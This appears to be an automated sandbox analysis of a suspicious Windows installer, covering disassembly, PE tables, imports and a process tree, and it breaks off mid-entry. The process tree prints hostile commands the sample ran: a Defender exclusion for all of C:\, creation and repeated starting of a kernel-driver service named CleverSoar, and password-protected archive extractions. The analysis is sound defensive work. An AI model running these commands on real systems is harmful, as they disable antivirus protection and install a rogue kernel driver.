                          mov ebp, esp
                          add esp, FFFFFFA4h
                          push ebx
                          push esi
                          push edi
                          xor eax, eax
                          mov dword ptr [ebp-3Ch], eax
                          mov dword ptr [ebp-40h], eax
                          mov dword ptr [ebp-5Ch], eax
                          mov dword ptr [ebp-30h], eax
                          mov dword ptr [ebp-38h], eax
                          mov dword ptr [ebp-34h], eax
                          mov dword ptr [ebp-2Ch], eax
                          mov dword ptr [ebp-28h], eax
                          mov dword ptr [ebp-14h], eax
                          mov eax, 004A2EBCh
                          call 00007F5C61251875h
                          xor eax, eax
                          push ebp
                          push 004A8AC1h
                          push dword ptr fs:[eax]
                          mov dword ptr fs:[eax], esp
                          xor edx, edx
                          push ebp
                          push 004A8A7Bh
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          mov eax, dword ptr [004B0634h]
                          call 00007F5C612E31FBh
                          call 00007F5C612E2D4Eh
                          lea edx, dword ptr [ebp-14h]
                          xor eax, eax
                          call 00007F5C612DDA28h
                          mov edx, dword ptr [ebp-14h]
                          mov eax, 004B41F4h
                          call 00007F5C6124B923h
                          push 00000002h
                          push 00000000h
                          push 00000001h
                          mov ecx, dword ptr [004B41F4h]
                          mov dl, 01h
                          mov eax, dword ptr [0049CD14h]
                          call 00007F5C612DED53h
                          mov dword ptr [004B41F8h], eax
                          xor edx, edx
                          push ebp
                          push 004A8A27h
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          call 00007F5C612E3283h
                          mov dword ptr [004B4200h], eax
                          mov eax, dword ptr [004B4200h]
                          cmp dword ptr [eax+0Ch], 01h
                          jne 00007F5C612E9F6Ah
                          mov eax, dword ptr [004B4200h]
                          mov edx, 00000028h
                          call 00007F5C612DF648h
                          mov edx, dword ptr [004B4200h]
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .rsrc | 0xcb000 | 0x11000 | 0x11000 | 39a54fc0c361d3fb2d2b0ae8b885da59 | False | 0.1877154181985294 | data | 3.7236783426264393 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                          RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                          RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                          RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                          RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                          RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                          RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                          RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                          RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                          RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                          RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                          RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                          RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                          RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
                          RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
                          RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
                          RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
                          RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
                          RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
                          RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
                          RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
                          RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
                          RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
                          RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
                          RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
                          RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
                          RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.2045454545454546
                          RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                          RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2797450424929179
                          RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                          DLL | Import
                          kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                          comctl32.dll | InitCommonControls
                          user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                          oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                          advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                          Name | Ordinal | Address
                          __dbk_fcall_wrapper | 2 | 0x40fc10
                          dbkFCallWrapperAddr | 1 | 0x4b063c
                          Language of compilation system | Country where language is spoken | Map
                          English | United States |
                          No network behavior found


                          Target ID:0
                          Start time:07:11:30
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe"
                          Imagebase:0x4d0000
                          File size:7'238'486 bytes
                          MD5 hash:D81E3F29D547BE83A40D0ACE4BD86985
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:07:11:31
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$20448,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe"
                          Imagebase:0x5c0000
                          File size:3'366'912 bytes
                          MD5 hash:6A58BEB829BD96D5574E24C76DD36FD9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          Target ID:3
                          Start time:07:11:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:07:11:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:07:11:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff6ef0c0000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:6
                          Start time:07:11:40
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT
                          Imagebase:0x4d0000
                          File size:7'238'486 bytes
                          MD5 hash:D81E3F29D547BE83A40D0ACE4BD86985
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:false

                          Target ID:7
                          Start time:07:11:40
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$2044C,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT
                          Imagebase:0xe20000
                          File size:3'366'912 bytes
                          MD5 hash:6A58BEB829BD96D5574E24C76DD36FD9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          Target ID:8
                          Start time:07:11:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:9
                          Start time:07:11:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:10
                          Start time:07:11:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:11
                          Start time:07:11:43
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                          Imagebase:0x3c0000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 0%, ReversingLabs
                          Has exited:true

                          Target ID:12
                          Start time:07:11:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:13
                          Start time:07:11:43
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                          Imagebase:0x3c0000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:14
                          Start time:07:11:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:15
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:16
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:17
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:18
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:19
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:20
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:21
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:22
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:23
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:24
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:25
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:26
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:27
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:28
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:29
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:30
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:31
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:32
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:34
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:35
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:36
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:37
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:38
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:39
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
